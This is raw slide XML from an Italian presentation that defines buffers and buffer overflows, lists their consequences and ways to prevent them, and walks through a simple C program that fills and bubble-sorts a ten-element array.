                <a:lnTo>
                  <a:pt x="573838" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573838" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="4453384" y="5037367"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573839" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573839" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="2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5" id="2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26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="295625" y="1537045"/>
            <a:ext cx="6207782" cy="7847330"/>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1 Bold"/>
              </a:rPr>
              <a:t>Cos’è Un Buffer ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> è una zona di memoria utilizzata per temporaneamente immagazzinare dati durante l'esecuzione di un programma. I buffer sono comunemente utilizzati per leggere o scrivere dati da o verso file, dispositivi di input/output, reti, e per elaborare input utente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2399">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Cos’è un Buffer Overflow ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> si verifica quando vengono inseriti più dati di quelli che il buffer è in grado di gestire, causando così la sovrascrittura della memoria oltre i limiti del buffer. Questo può accadere quando un programma non effettua una verifica accurata della lunghezza dei dati prima di inserirli nel buffer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9442274" y="1937770"/>
            <a:ext cx="8588968" cy="6833235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>conseguenze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>di un buffer overflow possono essere gravi e possono includere la corruzione della memoria, il crash del programma, e in alcuni casi, l'esecuzione di codice dannoso inserito nel buffer stesso (attacco di tipo buffer overflow). Questo rende i buffer overflow una vulnerabilità critica che può essere sfruttata da attaccanti per compromettere la sicurezza di un sistema informatico.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Per prevenire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>i buffer overflow, è essenziale implementare correttamente la gestione dei buffer, includendo la verifica accurata della lunghezza dei dati in ingresso e la limitazione delle operazioni di lettura/scrittura in modo che non superino i limiti del buffer. Utilizzare funzioni di libreria sicure e pratiche di programmazione difensive può ridurre significativamente il rischio di buffer overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4620"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1107704" y="4458598"/>
            <a:ext cx="15381560" cy="1659255"/>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2 - RIPRODUZIONE ED </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ESECUZIONE PROGRAMMA</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2.1 - DESCRIZIONE DEL PROGRAMMA</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8139790" y="8828932"/>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0" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="1983644"/>
            <a:ext cx="5455345" cy="1943716"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1943716" w="5455345">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5455345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5455345" y="1943717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1943717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-29072" r="-9073" b="-556260"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="4652973"/>
            <a:ext cx="5455345" cy="2023804"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2023804" w="5455345">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5455345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5455345" y="2023803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2023803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-117758" r="0" b="-385701"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="7402388"/>
            <a:ext cx="5455345" cy="1855912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1855912" w="5455345">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5455345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5455345" y="1855912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1855912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-263883" r="-5950" b="-333322"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10654596">
            <a:off x="6859485" y="2781990"/>
            <a:ext cx="2094728" cy="617945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="617945" w="2094728">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2094727" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2094727" y="617944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="617944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>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5" id="1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16" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9329652" y="2206938"/>
            <a:ext cx="6951177" cy="2398603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2718"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1941">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Alla riga 1 importiamo la libreria stdio.h, una libreria standard del linguaggio C che permette di utilizzare funzioni come printf e scanf.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2718"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1941">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Successivamente dichiariamo le variabili che saranno utilizzate nel codice e il vettore “vector” di cui specifichiamo anche la dimensione tra le parentesi quadre. In questo caso quindi, il vettore potrà contenere 10 elementi.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9329652" y="5276242"/>
            <a:ext cx="6951177" cy="1712849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2715"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1939">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nel seguente ciclo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1939">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1939">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> si procede all'inserimento dei 10 elementi nel vettore "vector": finché </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1939">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1939">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> sarà minore di 10, verrà stampato l'indice della posizione attuale (memorizzato nella variabile c) e sarà chiesto all'utente di inserire un numero da memorizzare in quella posizione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9329652" y="7987242"/>
            <a:ext cx="7130712" cy="719709"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2855"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2039">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Tramite questo ciclo for viene stampato in output il vettore in ordine di inserimento.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10654596">
            <a:off x="6859485" y="5514379"/>
            <a:ext cx="2094728" cy="617945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="617945" w="2094728">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2094727" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2094727" y="617945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="617945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10654596">
            <a:off x="6859485" y="8021372"/>
            <a:ext cx="2094728" cy="617945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="617945" w="2094728">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2094727" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2094727" y="617944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="617944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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2.1 - DESCRIZIONE DEL PROGRAMMA</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8558768" y="819926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0" id="10"/>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1" id="11"/>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Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="2590172"/>
            <a:ext cx="3676073" cy="2218683"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2218683" w="3676073">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3676073" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3676073" y="2218684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2218684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-239803" r="-18831" b="-100970"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="6713453"/>
            <a:ext cx="3676073" cy="1957853"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1957853" w="3676073">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3676073" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3676073" y="1957853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1957853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="-2855" t="-344343" r="-2855" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8564608" y="2561597"/>
            <a:ext cx="5805323" cy="4839589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2575"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il programma ordina gli elementi del vettore in ordine crescente utilizzando una concatenazione di due cicli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. La logica seguita è la seguente: se l'elemento in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>vector[k]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> è maggiore dell'elemento successivo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>vector[k+1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>), viene eseguito uno scambio tra i due elementi utilizzando una variabile temporanea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>swap_vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. In dettaglio:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="397255" indent="-198628" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2575"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L'elemento in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>vector[k]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> viene copiato in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>swap_vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
